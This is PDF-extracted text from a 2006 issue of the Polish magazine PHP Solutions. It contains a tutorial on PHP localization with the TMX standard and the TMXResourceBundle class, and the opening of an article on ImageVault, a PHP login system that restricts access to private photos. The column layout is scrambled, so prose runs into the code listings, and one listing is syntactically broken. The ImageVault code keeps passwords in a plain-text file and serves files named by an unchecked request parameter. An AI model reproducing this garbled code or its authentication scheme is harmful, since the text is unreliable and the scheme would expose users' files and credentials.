nych – m.in. kierował projektem medycz-
nym GTA w środowisku CMS opartym na
PHP, Javie i MySQL-u.
Kontakt z autorem:
solutions@netriviera.com
49
Narzędzia

Lokalizacja w PHP
przy użyciu standardu TMX
Stopień trudności: lll
Nicola Asuni

Wyobraź sobie, że jesteś głównym programistą

w zespole budującym olbrzymią aplikację, która
jako produkt przeznaczony na rynek globalny
musi wspierać dziesięć różnych języków.
Najprawdopodobniej nie chciałbyś udostępnić
swoich kodów źródłowych osobom postronnym
w celu wykonania tłumaczenia i mieć złudne
nadzieje, że w ramach tego procesu nie pojawią
się żadne „przypadkowe” błędy. Na szczęście
nie musiałbyś tego robić: dzięki TMX, Twoje
tłumaczenie mogłoby być wykonane szybko
i łatwo, zaś Twój kod pozostałby nienaruszony.

W SIECI
1. http://tmxphpbridge.sourcef
orge.net – klasa pomostowa
PHP-TMX
2. http://www.lisa.org – witryna
organizacji LISA
3. http://tecnick.com – strona
domowa firmy Tecnick.com
S
tandard TMX (ang. Transla-
tion Memory eXchange) powstał
w ramach projektu Oscar (skrót
angielskich słów: Open Standards for
Container/Content Allowing Re-use), wy-
konywanego w ramach jeden z inicjatyw
stowarzyszenia LISA (ang. Localization In-
dustry Standards Association; patrz: ram-
ka LISA).
Celem autorów TMX było dostar-
czenie neutralnego systemu wymiany
danych pomiędzy różnymi systemami
translacji, przy jednoczesnej minimaliza-
cji i eliminacji strat krytycznych informa-
cji. TMX jest w pełni zgodny ze standar-
dem XML. Wspiera również kodowanie
znaków Unicode, oraz wielorakie stan-
dardy ISO (dotyczące między innymi for-
matów opisu daty/czasu, kody językowe i
narodowe).
Od tablic do TMX
Duża cześć oprogramowania pisanego
w PHP jest lokalizowana przy użyciu ta-
blic jako kontenerów translacyjnych (ele-
mentów służących do przechowywania
tłumaczonego tekstu). W takim kontek-
ście, zasoby tekstowe (np. menu, opi-
sy, nagłówki, informacje dla użytkow-
nika) są przechowywane bezpośred-
nio w kodzie źródłowym, jako elemen-
ty tablic, do których można się w ra-
zie potrzeby odwoływać. W ogólnym
przypadku, korzystając z takiej techni-
ki lokalizacji tworzy się oddzielny plik,
bądź zbiór plików dla każdego języ-
ka wspieranego przez aplikację. Na Li-
Co należy wiedzieć...
Powinieneś znać podstawy PHP oraz
XML. Przyda się również wiedza związa-
na z zagadnieniem internacjonalizacji.
Co obiecujemy...
Po przeczytaniu artykułu będziesz wie-
dział jak obsłużyć lokalizację projektu
PHP przy użyciu TMX.

50 www.phpsolmag.org PHP Solutions Nr 3/2006

 Lokalizacja na bazie TMX Narzędzia

stingu 1 przedstawiony jest przykładowy – i rzeczywiście działa. Dlaczego zatem tłumaczeniem. Tak też jest zazwyczaj
tekst Witaj Świecie w języku angielskim mielibyśmy zaprzestać jego używania? w praktyce, to znaczy: nikt nie zmusza
i włoskim, zdefiniowany w dwóch plikach: Pierwszy i prawdopodobnie najważ- programisty do rozszerzania istniejące-
english.php and italian.php. niejszy z powodów to komfort potencjal- go kodu o obsługę nowego języka – tym
Biorąc pod uwagę, że wielu programi- nych tłumaczy. Kiedy projekt rośnie i sta- zajmują się zazwyczaj tłumacze, czyli
stów postępuje w ten sposób, prezento- je się umiędzynarodowiony, niemożliwo- (w ogólnym przypadku) osoby nie po-
wane rozwiązanie musi działać poprawnie ścią jest aby programiści zajmowali się trafiące programować. W tym miejscu
mamy idealną okazję na pojawienie się
Listing 1. Typowa implementacja kontenerów translacyjnych w języku PHP przypadkowych błędów w kodzie: wy-
starczy, że tłumacz niechcący usunie
<?php jeden średnik (;) lub doda cudzysłów.
// english.php W rezultacie, po każdym tłumaczeniu
$res = Array();
kod wymaga ponownej rewizji, którą mu-
$res['DatabaseEmpty'] = "The database is empty!";
$res['HelloWorld'] = "Hello World!"; szą wykonać programiści.
?> Z drugiej strony, składowanie zasobów
<?php tekstowych w formacie TMX pozwala tłu-
// italian.php maczom eksportować i importować dane
$res = Array();
pomiędzy swoimi preferowanymi narzę-
$res['DatabaseEmpty'] = "Il database č vuoto!";
$res['HelloWorld'] = "Ciao a tutti!"; dziami (jak wspominałem wcześniej, istnie-
?> je wiele takich narzędzi). Zasoby powiąza-
ne z procesem tłumaczenia są całkowicie
Listing 2. Przykład pliku TMX odseparowane i uniezależnione od jakie-
<?xml version="1.0" ?>
gokolwiek języka programowania. Wspo-
<tmx version="1.4"> mniane narzędzia pozwalają modyfikować
<header zawartość dokumentu lecz chronią struktu-
creationtool="XYZTool" rę tagów, dzięki czemu nie ma obawy, że
creationtoolversion="1.01-023"
tłumacz coś „zepsuje”.
datatype="PlainText"
segtype="sentence"
Kolejny powód, który sprawia, że tabli-
adminlang="en-us" ce nie są dobrym rozwiązaniem w kontek-
srclang="EN" ście mechanizmów wsparcia internacjona-
o-tmf="ABCTransMem">
</header>
<body>
<tu tuid="DatabaseEmpty" datatype="plaintext">
Internacjonalizacja
Internacjonalizacja (ang. Internationaliza-
<tuv xml:lang="en">
tion; w skrócie: i18n) jest w kontekście in-
<seg>The database is empty!</seg>
żynierii oprogramowania procesem pla-
</tuv>
nowania oraz implementacji produktów i
<tuv xml:lang="it"> usług w taki sposób, aby cechowały się
<seg>Il database č vuoto!</seg> one łatwością adaptacji do specyficznych
</tuv> aspektów kulturowych (głównie lokalnych
</tu> języków). Wspomniany proces adaptacji
<tu tuid="HelloWorld" datatype="plaintext"> takich produktów nazywamy lokalizacją.
<tuv xml:lang="en"> Jednym z głównych aspektów in-
<seg>Hello World!</seg> ternacjonalizacji jest odseparowanie ba-
</tuv> zowego kodu źródłowego produktu od
<tuv xml:lang="it"> wszelkiego rodzaju zasobów (tekstów,
<seg>Ciao a Tutti!</seg> nagłówków, informacji) które są zmien-
</tuv> ne w kontekście różnych języków bądź
</tu> kultur. Takie podejście znacznie uprasz-
</body> cza proces tłumaczenia – dzięki temu,
</tmx> że wspomniane zasoby są dobrze zde-
finiowane i odseparowane w zewnętrz-
Listing 3. Sposób użycia klasy TMXResouceBundle nych Kontenerach Translacyjnych (ang.
Translation Memories). Kontenery Trans-
// 1. dołaczamy plik z definicją klasy TMXResourceBundle lacyjne, zwane również Bazami Transla-
require_once('TMXResourceBundle.php'); cji, to zbiory sentencji zapisane w języku
// 2. tworzymy instancję obiektu klasy TMXResourceBundle specyfikując przy tym
referencyjnym, powiązane z odpowiada-
// nazwę pliku z zasobami TMX oraz kod interesującego nas języka
jącymi im tłumaczeniami w językach ob-
cych. Sentencja referencyjna powiązana
$tmxres = new TMXResourceBundle("tmx_file_name.xml","en");
z tłumaczeniami nazywana jest Jednost-
// 3. wyświetlamy napis odpowiadający identyfikatorowi 'HelloWorld'
ką Translacyjną (ang. Translation Memo-
echo $tmxres->resource['HelloWorld'];
ry Unit).

PHP Solutions Nr 3/2006 www.phpsolmag.org 51

Narzędzia Lokalizacja na bazie TMX
���
����������
�������
������
Rysunek 1. Połączenie PHP i TMX
lizacji, to niski poziom możności ponowne-
go użycia tłumaczonych zasobów. Warto
zauważyć, że na rynku globalnym koszty
tłumaczenia (oraz jego uaktualnień) mogą
bardzo szybko rosnąć. W tej sytuacji do-
brym pomysłem jest odseparowanie zaso-
bów powiązanych z translacją i zapewnie-
nie możliwości wykorzystania ich później,
w innym kontekście.
Przygotowanie do
tłumaczenia: kontenery
translacyjne
Przygotujmy się do tłumaczenia. Na po-
czątek potrzebujemy Kontenerów Transla-
cyjnych (ang. Translation Memories, TM),
o których wspominałem wcześniej w kon-
tekście tablic PHP. TMX do tworzenia,
składowania i przetwarzania takich konte-
nerów używa języka XML. Do ich budowy
wykorzystuje się zazwyczaj specyficzne
oprogramowanie narzędziowe określane
jako CAT (ang. Computer Aided Transla-
tion), jednak biorąc pod uwagę niewielkie
rozmiary naszego przykładowego projek-
tu, kontenery te stworzymy ręcznie.
Załóżmy, że w kontekście naszego
projektu potrzebować będziemy dwóch
wiadomości: Baza danych jest pusta (ang.
Database is empty) oraz Witaj Świecie!
(ang. Hello, World!).
Wspomniane zasoby opisane będą
w dwóch językach: angielskim i wło-
skim. Do ich przechowywania stworzy-
52
odpowiadający tej jednostce (w naszym
przykładzie jest to czysty tekst). Wewnątrz
sekcji <tu> definiujemy wszystkie wersje
językowe tekstu przechowywanego w da-
nym kontenerze. Każda wersja jest repre-
���
zentowana przez tag <tuv> (ang. trans-
lation unit variant), definiujący język (np.
xml:lang=”en” dla angielskiego). Czysty
tekst tłumaczenia umieszczony jest w seg-
mencie, reprezentowanym przez element
opisany parą tagów: <seg>...</seg>.
W porządku, umieściliśmy nasz tekst
w dokumencie XML. Nie zamierzam za-
nudzać czytelników (a szczególnie: czytel-
ników-programistów) kolejnym wywodem
o wyższości tego formatu opisu danych
nad innymi formatami. Jednak jakie są
��� wady tego rozwiązania? Czy takowe
���� w ogóle istnieją? Cóż, faktem jest, że ta-
blica nadal pozostaje najbardziej natural-
nym kontenerem do przechowywania da-
nych w PHP, zaś korzystanie z dokumen-
tu XML wiąże sie z dodatkowym parsowa-
niem. W tej sytuacji dobrze byłoby użyć
klasy (nazwijmy ją roboczo klasą pomo-
my dwa kontenery: DatabaseEmpty oraz stową PHP-TMX), która przeczyta da-
HelloWorld. Spójrzmy na Listing 2. Co wi- ne bezpośrednio z dokumentu TMX/XML
dzimy? Każdy plik TMX rozpoczyna się i wypełni nimi tablicę PHP (jak pokazano
jak zwyczajny plik XML: <?xml....?>; da- na Rysunku 1). Takie podejście pozwoliło-
lej otwierany jest element <tmx>, stano- by nam jednocześnie wykorzystać zalety
wiący korzeń dokumentu. Pomińmy tag obydwu rozwiązań! Podstawową wadę te-
<header>, który przechowuje informacje go podejścia stanowi potrzeba wczytywa-
o autorze pliku i narzędziu wykorzystanym nia całego dokumentu TMX do pamięci,
do jego stworzenia, przejdźmy od razu do co może stanowić poważny narzut (głów-
elementu <body> i zawartych tam sekcji nie w kontekście czasu i pamięci). Niedo-
<tu>...</tu>. Każda z tych sekcji stanowi godność tę można zniwelować przy wyko-
jednostkę translacji (ang. translation unit; rzystaniu technik keszowania.
stąd skrót tu), reprezentującą poszcze-
gólne kontenery translacyjne. Każda taka Klasa pomostowa
jednostka jest identyfikowana przez tuid, PHP-TMX
stanowiący unikalną nazwę kontenera. Dla wszystkich czytelników zaintrygowa-
W tagu rozpoczynającym jednostkę trans- nych tematem mam dobrą wiadomość:
lacji możemy też zdefiniować typ danych wspomnianej klasy nie musimy wcale bu-
Polecana literatura
Ÿ Asuni N, "Java Localization with TMX standard" [wersja online] 2004-10-14,
http://www.tecnick.com/public/code/cp_dpage.php?aiocp_dp=article_tmx
Ÿ Asuni N, "TMXResourceBundle – TMX Java Bridge" [wersja online] 2005-01-08,
http://tmxjavabridge.sourceforge.net
Ÿ Itagaki M, "Use XML as a Java Localization Solution" [wersja online] 2000-11-10,
http://www.ftponline.com/javapro/archives/mi0011/default.asp
Ÿ O'Conner J, "Java Internationalization: Localization with ResourceBundles" [wersja
online] 1998-10-01,
http://java.sun.com/developer/technicalArticles/Intl/ResourceBundles
Ÿ OSCAR – LISA, "TMX – Translation Memory eXchange" [wersja online] 2004-10-01,
http://www.lisa.org/standards/tmx
Ÿ OSCAR – LISA, "TMX 1.4b Specification" [wersja online] 2005-03-26,
http://www.lisa.org/standards/tmx/tmx.html
Ÿ W3C, "Extensible Markup Language (XML)" [online] 2005-08-02,
http://www.w3.org/XML
www.phpsolmag.org PHP Solutions Nr 3/2006
Narzędzia Lokalizacja na bazie TMX
dować własnoręcznie: istnieje bardzo do-
bre rozwiązanie typu Open Source (licen-
cja (GNU/GPL) oferujące opisaną wyżej
funkcjonalność. Rozwiązanie to dostar-
czone jest w postaci klasy TMXResour-
ceBundle, napisanej w języku PHP5 i do-
stępnej nieodpłatnie pod adresem http://
tmxphpbridge.sourceforge.net.
Aktualna wersja standardu TMX (1.4b)
opisuje dziesięć elementów strukturalnych
i siedem elementów dołączonych. W kon-
tekście używania klasy TMXResouceBun-
dle do obsługi tłumaczenia prostego tekstu
potrzeba nam jedynie trzech elementów:
<tu>, <tuv> and <seg> (wszystkie opisane
wyżej).
Mając gotowy plik TMX z opisem
zasobów tekstowych wykorzystywanych
w ramach naszego przykładowego projek-
tu, używanie klasy TMXResouceBundle
jest dziecinnie proste (proponuję rzucić
okiem na Listing 3). Musimy jedynie do-
łączyć odpowiedni plik i stworzyć obiekt
wspomnianej klasy (np. $tmxres), przy
czym jako parametr do konstruktora na-
leży przekazać nazwę docelowego pliku
TMX. Po wykonaniu tych czynności może-
my korzystać ze wszystkich metod i skład-
ników oferowanych w ramach interfejsu
klasy (np. resource, który pozwala pobrać
napis powiązany z określanym kontene-
rem translacji).
Taki sposób postępowania może
być oczywiście znacznie rozbudowany
i usprawniony, w zależności od potrzeb.
Na przykład pierwsze dwa, ze wspo-
mnianych kroków, można przenieść do
pliku konfiguracyjnego PHP (dzięki te-
mu będą uruchomione tylko raz), a na-
stępnie skorzystać z technik keszowania.
LISA
Założona w roku 1990, jest ogólno-
światową organizacją typu non-profit.
Działalność tej organizacji można scha-
rakteryzować za pomocą czterech haseł:
Globalizacja, Internacjonalizacja, Lokali-
zacja i Translacja (w skrócie: GLIT). LISA
skupia wokół siebie pojedyncze osoby,
firmy, stowarzyszenia i organizacje, przy
czym wszystkie te podmioty powiązane
są z szeroko pojętym językoznawstwem,
w kontekście technologii informatycz-
nych. W ramach inicjatywy LISA działają
liczni profesjonaliści reprezentujący po-
nad 400 wiodących producentów oraz
dostawców usług z branży IT. Ich celem
jest tworzenie wytycznych pracy oraz
standardów dla technologii wspierają-
cych internacjonalizację, w pryzmacie
globalizacji rynku i przedsiębiorstw.
54
Listing 4. Konstruktor klasy TMXResouceBundle
public function __construct($tmxfile, $language) {
// czyścimy tablicę
$this->resource = array();
// ustawiamy wybrany język
$this->language = strtoupper($language);
// tworzymy nową instancję parsera XML, do użytku innych funkcji XML
$this->parser = xml_parser_create();
// następująca funkcja pozwala wykorzystać stworzony parser wewnątrz obiektu
xml_set_object($this->parser, $this);
// wyłączamy w parserze opcję “case-folding”
// (ignorowanie różnic wynikających z wielkosci liter)
xml_parser_set_option($this->parser, XML_OPTION_CASE_FOLDING, 0);
// ustawiamy wywołanie zwrotne do obsługi elementów w parserze XML
xml_set_element_handler($this->parser, "startElementHandler",
"endElementHandler");
// ustawiamy wywołanie zwrotne do obsługi danych znakowych w parserze XML
xml_set_character_data_handler($this->parser, "segContentHandler");
// rozpoczynamy parsowanie dokumentu
if(!xml_parse($this->parser, file_get_contents($tmxfile))) {
die(sprintf("ERROR TMXResourceBundle :: XML error: %s at line %d",
xml_error_string(xml_get_error_code($this->parser)),
xml_get_current_line_number($this->parser)));
}
// zwalniamy parser
xml_parser_free($this->parser);
}
Listing 5. Wywołanie zwrotne do obsługi początków elementów XML
private function startElementHandler($parser, $name, $attribs) {
switch(strtolower($name)) {
case 'tu': {
// jednosta translacyjna; zawiera unikalny identyfikator (tuid)
if (array_key_exists('tuid', $attribs)) {
$this->current_key = $attribs['tuid'];
}
break;
}
case 'tuv': {
// wariant jednostki translacyjnej; zawiera kod języka
if (array_key_exists('xml:lang', $attribs)) {
$this->current_language = $attribs['xml:lang'];
}
break;
}
case 'seg': {
// segment; zawiera przetłumaczony tekst
$this->segdata = true;
$this->current_data = "";
break;
}
default: {
break;
}
}
}
www.phpsolmag.org PHP Solutions Nr 3/2006
 Lokalizacja na bazie TMX Narzędzia

Prostym przykładem takiej techniki mo- tekę expat). Funkcjonalność ta pozwala segContentHandler() (Listing 7) przetwa-
głoby być zapisywanie i odczytywanie ta- tworzyć niewalidujące parsery XML i de- rza ciągi znaków umieszczone pomiędzy
blicy $tmxres->resource do/z pliku bądź finiować dla nich wywołania zwrotne re- elementami dokumentu XML. Warto za-
rekordu w bazie danych, przy wykorzy- agujące na różnego rodzaju zdarzenia uważyć, że w trakcie przetwarzania za-
staniu mechanizmu serializacji. związane z procesem przetwarzania do- wartości węzła <seg>, wartość atrybutu
kumentu XML. Jak każdy parser XML, xml:lang dla nadrzędnego elementu tuv,
Jak działa klasa również i ten mechanizm można odpo- odpowiada parametrowi $language prze-
TMXResouceBundle wiednio dostosować do swoich potrzeb. kazanemu w konstruktorze klasy. Metoda
Jak pokazano na Listingu 4, konstruk- Metoda startElementHandler() (Li- segContentHandler() odwzorowuje wy-
tor klasy pobiera jako parametry nazwę sting 5) ustala wartości zmiennych sta- brany ciąg znaków na konkretny element
i ścieżkę docelowego pliku TMX, a tak- nu w momencie otwarcia elementu TMX. tablicy zasobów. Odwołanie do tego ele-
że kod ISO określający język. Wewnątrz Metoda endElementHandler() (Listing 6) mentu odbywa się przy użyciu atrybutu
konstruktora zdefiniowany jest parser resetuje te wartości kiedy element TMX tuid (określonego w tagu tu), który wy-
TMX. Parser ten działa w oparciu o stan- jest zamykany. Zmienne stanu prze- korzystywany jest jako indeks.
dardowe udogodnienie: PHP XML Parser chowują informacje na temat aktualnie Po zakończeniu procesu parsowa-
Functions (wykorzystujące z kolei biblio- przetwarzanego elementu TMX. Metoda nia, tablica zasobów będzie wypełniona
danymi odpowiadającymi wybranemu ję-
Listing 6. Wywołanie zwrotne do obsługi końców elementów XML zykowi. Jak wspomniałem wyżej, indek-
sami dla poszczególnych elementów są
private function endElementHandler($parser, $name) { odpowiadające im wartości identyfikato-
switch(strtolower($name)) { rów (tuid). Ostania z rozważanych me-
case 'tu': {
tod: getResource (Listing 8), zwraca tabli-
// jednosta translacyjna; zawiera unikalny identyfikator (tuid)
$this->current_key = ""; cę zasobów.
break;
} Podsumowanie
case 'tuv': { W niniejszym artykule przedstawiono
// wariant jednostki translacyjnej; zawiera kod języka
podstawowe techniki internacjonaliza-
$this->current_language = "";
break; cji w kontekście języka PHP. Pokaza-
} no jak, w łatwy sposób, można wykorzy-
case 'seg': { stać możliwości TMX, nawet przy ręcz-
// segment; zawiera przetłumaczony tekst nym tworzeniu pliku z zasobami. Silne
$this->segdata = false;
rozgraniczenie pomiędzy kodem apli-
if (!empty($this->current_data) OR !array_key_exists($this->current_
key, $this->resource)) { kacji, a danymi, możliwość ponowne-
$this->resource[$this->current_key] = $this->current_data; // go użycia jednostek translacji oraz wy-
ustawiamy nowy element tablicy goda i łatwość użytkowania czyni tech-
} nologię TMX idealnym wyborem przy
break;
rozwiązywaniu problemów związanych
}
default: { z internacjonalizacją programów tworzo-
break; nych w PHP. n
}
}
}

Listing 7. Wywołanie zwrotne do obsługi zawartości tekstowej występującej

pomiędzy elementami XML O autorze
private function segContentHandler($parser, $data) {
Nicola Asuni jest założycielem i pre-
if($this->segdata AND (strlen($this->current_key)>0) AND (strlen($this-
zesem firmy Tecnick.com S.r.l, będącej
>current_language)>0)){
jednym z czołowych dostawców wyso-
// jesteśmy w środku elementu seg kiej klasy oprogramowania webowego
if (strcasecmp($this->current_language, $this->language) == 0) { opartego na licencji Open Source. Od
// dotarliśmy do frazy stanowiącej tłumaczenie 1993 roku autor pracował jako niezależ-
$this->current_data .= $data; ny programista, udzielając się mocno w
} wielu projektach związanych z aplikacja-
} mi web. Jest miedzy innymi twórcą wi-
} tryny Technick.net, a także członkiem i
współzałożycielem stowarzyszenia Ja-
Listing 8. Metoda getResource va User Group Sardegna Onlus i uczest-
nikiem GULCh – Gruppo Utenti Linux
public function getResource() { Cagliari. Dodatkowe informacje na te-
return $this->resource; mat autora można znaleźć pod adresem
} http://nicolaasuni.tecnick.com

PHP Solutions Nr 3/2006 www.phpsolmag.org 55

Projekty

ImageVault: Ograniczanie dostępu

do plików graficznych
i multimedialnych w PHP
Stopień trudności: lll
Patrick O’Brien

Każdy chyba ma jakieś prywatne zdjęcia,

którymi za pośrednictwem strony internetowej
chciałby się podzielić ze znajomymi, rodziną czy
kolegami z pracy, ale które wolałby jednocześnie
ukryć przed wścibskim ogółem internautów.
Cel ten można łatwo osiągnąć mając do
dyspozycji serwer WWW obsługujący PHP
oraz przedstawioną w tym artykule aplikację
kontrolującą dostęp do obrazów.

S
wego czasu znajomy zapytał
mnie, czy (i w jaki sposób) da-
łoby się ograniczyć dostęp do
umieszczonych na jego stronie interne-
towej zdjęć jego dzieci grających w pił-
kę, aby były one wyświetlane wyłącz-
nie autoryzowanym użytkownikom. Moim
pierwszym pomysłem było zabezpiecze-
nie całej witryny hasłem, jednak gdyby
zdeterminowanemu użytkownikowi uda-
ło się ustalić nazwy i ścieżki plików gra-
W SIECI ficznych, to mógłby on teoretycznie omi-
nąć zabezpieczenia i wyświetlić chronio-
ne zdjęcia.
1. http://www.devshed.com/c/
Po chwili namysłu doszedłem do
a/PHP/Private-Pages-with- wniosku, że najbezpieczniej będzie
PHP-and-Text-Files umieścić pliki poza publicznie dostęp-
– alternatywne rozwiązanie
zabezpieczania plików nym katalogiem serwera WWW, a na-
2. http://www.experts- stępnie napisać aplikację PHP, która
exchange.an/web.web_
Languages/PHP/Q_ na podstawie loginu i hasła będzie udo-
21267129.html stępniać te pliki autoryzowanym użyt-
– tutorial przedstawiający
sposób zabezpieczania pli-
kownikom. Narzędzie to musi też umoż-
ków na serwerze. liwiać wylogowanie użytkownika po za-
kończeniu przeglądania.
Podstawowa struktura
systemu
Strukturę systemu przedstawia Rysu-
nek 1. Nas najbardziej interesują elementy
umieszczone w katalogu public_html. Po-
szczególne moduły aplikacji to:
l
Moduł logowania, sprawdzający infor-
macje podane przez użytkownika i na
ich podstawie podejmujący decyzję o
dopuszczeniu go do chronionych da-
nych. Moduł składa się z plików in-
dex.php i main.php.
Powinieneś wiedzieć...
Niezbędna będzie znajomość podstaw
PHP.
Obiecujemy...
Stworzymy system udostępniający
umieszczone na stronie pliki graficz-
ne wyłącznie autoryzowanym użyt-
kownikom.

56 www.phpsolmag.org PHP Solutions Nr 3/2006

 ImageVault Projekty

l
Moduł wylogowania, pozwalający za-
logowanemu użytkownikowi wyjść
z aplikacji (plik logoff.php).
l
Skrypt udostępniający uprawnionym
użytkownikom pliki graficzne składo-
wane poza katalogiem public_html
(plik imageserver.php).
l
Dwa skrypty narzędziowe: jeden gene-
rujący kod znaczników dostępnych ob-
razów (plik linkgen.php), a drugi unie-
możliwiający zapisanie obrazu po klik-
nięciu go prawym przyciskiem myszy.
Logowanie
Po otwarciu głównej strony witryny, użyt-
kownik powinien zobaczyć albo stronę
ze zdjęciami (dla użytkowników zalogo-
wanych), albo formularz logowania (dla
wszystkich innych). Odpowiada za to plik
index.php.
Wyświetlany kod HTML będzie skła-
dowany w osobnym pliku index.html, któ-
ry (podobnie jak same zdjęcia) będzie się
znajdował poza publicznym katalogiem
serwera WWW, w katalogu imagevault,
który z kolei możemy założyć w dowolnym
katalogu, do którego będzie miał dostęp
parser PHP (np. /usr/local/imagevault). Ta-
kie podejście pozwoli użytkownikowi aktu-
alizować stronę poprzez zwykłą edycję ko-
du HTML w tym pliku. Jest to o tyle istotne,
że użytkownik może nie mieć praw do mo-
dyfikacji skryptów wyświetlających galerię,
ale na pewno będzie posiadał uprawnienia
do zmiany własnych plików.
Na Listingu 1 przedstawiamy komplet-
ny kod pliku index.php. Jego działanie za-
czyna się od dołączenia pliku showlogin-
page.php, po czym przebiega według na-
stępującego algorytmu:
l
Sprawdzenie parametrów sesji w ce-
lu zweryfikowania, czy użytkownik jest
zalogowany:
l
Jeśli tak, zawartość pliku in-
dex.html jest odczytywana i prze-
kazywana do przeglądarki,
l
Jeśli nie, użytkownik jest przekie-
rowywany do ekranu logowania
(showloginpage.php).
Za generowanie ekranu logowania odpo-
wiada funkcja showLoginPage(), zapisa-
na w osobnym pliku showloginpage.php
(Listing 2) i w tym przypadku wywoływa-
na bez argumentu.
Dane użytkownika podane przy lo-
gowaniu (login i hasło) są przesyłane do
skryptu main.php (Listing 3), który wyko-
nuje następujące operacje:
l
Pobranie przekazanego loginu i hasła
l
Sprawdzenie, czy podane informacje
są poprawne:
l
Jeśli tak, skrypt inicjalizuje se-
sję, ustawia zmienną sesyjną
validuser i przekazuje do przeglą-
darki stronę index.html
l
Jeśli nie, użytkownikowi zostanie
ponownie zaprezentowany ekran
logowania, tym razem z dodatko-
wą informacją o błędnych danych;
to wyświetlenie również realizu-
je funkcja showLoginPage(), tym
razem wywoływana z łańcuchem
error jako argumentem.

Loginy i hasła użytkowników są składo-

Listing 1. Strona główna witryny (plik index.php)
wane w pliku tekstowym users.txt, znaj-
/* Pat OBrien, 10 stycznia 2006 */ dującym się w tym samym katalogu, co in-
// Sprawdzenie, czy użytkownik jest zalogowany dex.html (czyli imagevault). Zawartość pli-
require_once "showloginpage.php"; ku odczytuje funkcja get_users(), która
session_start();
następnie przetwarza pobrane dane i zapi-
$validuser = $_SESSION['validuser'];
if ($validuser == 10) { suje je w tablicy $username. Za autoryzację
// Użytkownik jest zalogowany, więc otrzyma stronę index.html z katalogu użytkownika odpowiada funkcja check_
// imagevault user(), która sprawdza, czy informacje po-
$lines = file("../imagevault/index.html"); dane w formularzu logowania odpowiadają
foreach ($lines as $line) { print $line; }
jednemu z wpisów w pliku users.txt. Jeśli
}else{ // Użytkownik nie jest jest zalogowany, więc otrzyma ekran logowania
print (showLoginPage()); użytkownik ma prawo dostępu do strony,
exit; zostanie otwarta sesja użytkownika wraz
?> z ustawieniem wspomnianej już zmiennej
sesyjnej validuser, po czym do przeglą-
Listing 2. Funkcja showLoginPage() (plik showloginpage.php)
darki użytkownika zostanie wysłany kod
function showLoginPage($msg_type='general'){ strony głównej (index.html). W przypad-
if($msg_type=='general'){ ku nieudanego logowania, użytkownik po-
$message='Serwis dostępny wyłącznie dla użytkowników zalogowanych; nownie zobaczy ekran logowania.
<br>\n';
}elseif($msg_type=='error'){
$message='Nieprawidłowe dane użytkownika, spróbuj jeszcze raz; ';
Struktura plików
}elseif($msg_type=='logout'){ i katalogów
$message='Dziękujemy – zostałeś wylogowany z systemu.\n. Aby się ponownie Zanim zajmiemy się samym procesem
zalogować, '; } udostępniania plików, wypadałoby raz jesz-
$message='podaj login i hasło i kliknij przycisk'; cze wyjaśnić strukturę plików i katalogów, z
$result="<html>\n<body bgcolor='#FFFFFF'>\n".
jaką mamy do czynienia – ilustruje ją Rysu-
"<form method='post' action='main.php' name='login'>\n".
... nek 1. Katalogiem głównym serwera WWW
"</form></html>\n"; jest public_html, więc wszystkie pliki w ob-
return $result; rębie tego katalogu są publicznie dostęp-
} ne z Internetu. Chronione pliki umieścimy
gdzie indziej – w katalogu imagevault.

PHP Solutions Nr 3/2006 www.phpsolmag.org 57

Projekty ImageVault

Wylogowanie następnie przekierowany do ekranu lo- sting 4), umieszczonym w katalogu pu-
System powinien też umożliwiać użyt- gowania, który ponownie wygenerujemy blic_html. Aby z niego skorzystać, wystar-
kownikowi wylogowanie się. Osiągniemy za pomocą funkcji showLoginPage(), tym czy w kodzie HTML umieścić następujący
to anulując wszystkie zmienne sesyjne razem przekazując łańcuch logout jako odsyłacz: <a href="logoff.php">Wylogow
wywołaniem session_unset(), a następ- jej argument. anie</a>.
nie usuwając bieżącą sesję wywołaniem Kod realizujący wylogowanie zo-
session_destroy(). Użytkownik zostanie stanie zapisany w pliku logoff.php (Li- Udostępnianie plików
graficznych poprzez
Listing 3. Logowanie (plik main.php) PHP
Pora przejść do sedna systemu, czyli pro-
<?php
cesu udostępniania plików graficznych.
/* Pat OBrien, 10 stycznia 2006 */
require_once "showloginpage.php"; Kod realizujący to zadanie jest zapisany
function get_users() { // Pobiera listę autoryzowanych użytkowników w pliku imageserver.php (Listing 5), a jego
global $username, $password, $nusers; działanie obejmuje:
$nusers = 0;
$lines = file("../imagevault/users.txt"); l
Sprawdzenie zmiennej sesyjnej
foreach ($lines as $line) {
// Każdy wiersz pliku powinien mieć postać [LOGIN]|[HASŁO] validuser w celu zweryfikowania, czy
$elements = explode("|", $line); użytkownik jest zalogowany:
$username[$nusers] = trim($elements[0]); l
Jeśli tak, skrypt pobiera na-
$password[$nusers] = trim($elements[1]); zwę żądanego pliku poprzez
$nusers++; } }
$_REQUEST['filename'], po czym
// Sprawdzenie, czy podane informacje odpowiadają jednemu z wpisów w pliku
function check_user($username_entered,$password_entered) { odczytuje odpowiedni plik z ka-
global $username, $password, $nusers; talogu imagevault i zwraca go żą-
$validuser = 0; dającemu
for ($i=0;$i<$nusers;$i++) { l
Jeśli nie, skrypt zwraca pojedyn-
if ( (strcmp($username_entered,$username[$i]) == 0) &&
czą spację i kończy działanie
(strcmp($password_entered,$password[$i]) == 0) ) {
$validuser = 10; } }
return $validuser; Istotną kwestią w przypadku pliku image-
} server.php jest sposób pobierania pliku
/*---------------- Część główna ----------------------------------*/ obrazu i odsyłania go żądającemu. Wy-
$validuser = 0;
korzystana jest tu funkcja fpassthru(), co
// Pobranie nazwy użytkownika i hasła z formularza logowania
$username_entered = $_REQUEST["username"]; ma tę zaletę, że operacja jest niemal tak
$password_entered = $_REQUEST["password"]; szybka, jak bezpośredni dostęp do pliku,
// Pobranie listy autoryzowanych użytkowników z pliku /imagevault/users.txt a na pewno dużo szybsza od wczytywa-
get_users(); nia treści do zmiennej PHP i następujące-
// Sprawdzenie poprawności podanych danych
go po tym odsyłania jej klientowi.
$validuser = check_user($username_entered,$password_entered);
// Jeśli dane są poprawne: inicjalizacja sesji, ustawienie zmiennej sesyjnej Drugą istotną kwestią jest to, że zażą-
// validuser danie nieistniejącego pliku spowoduje za-
// i zwrócenie klientowi strony index.html pisanie komunikatu o błędzie w pliku er-
if ($validuser == 10) { rorlog.txt, znajdującym się w katalogu ob-
// Przygotowanie i inicjalizacja sesji
razów (jeśli plik nie istnieje, zostanie auto-
session_start();
session_register("validuser"); matycznie utworzony). Rejestrowanie błę-
$_SESSION['validuser'] = $validuser; dów pozwoli administratorowi witryny wy-
// Zwrócenie strony użytkownikowi kryć i poprawić błędne odsyłacze do pli-
$lines = file("../imagevault/index.html"); ków graficznych.
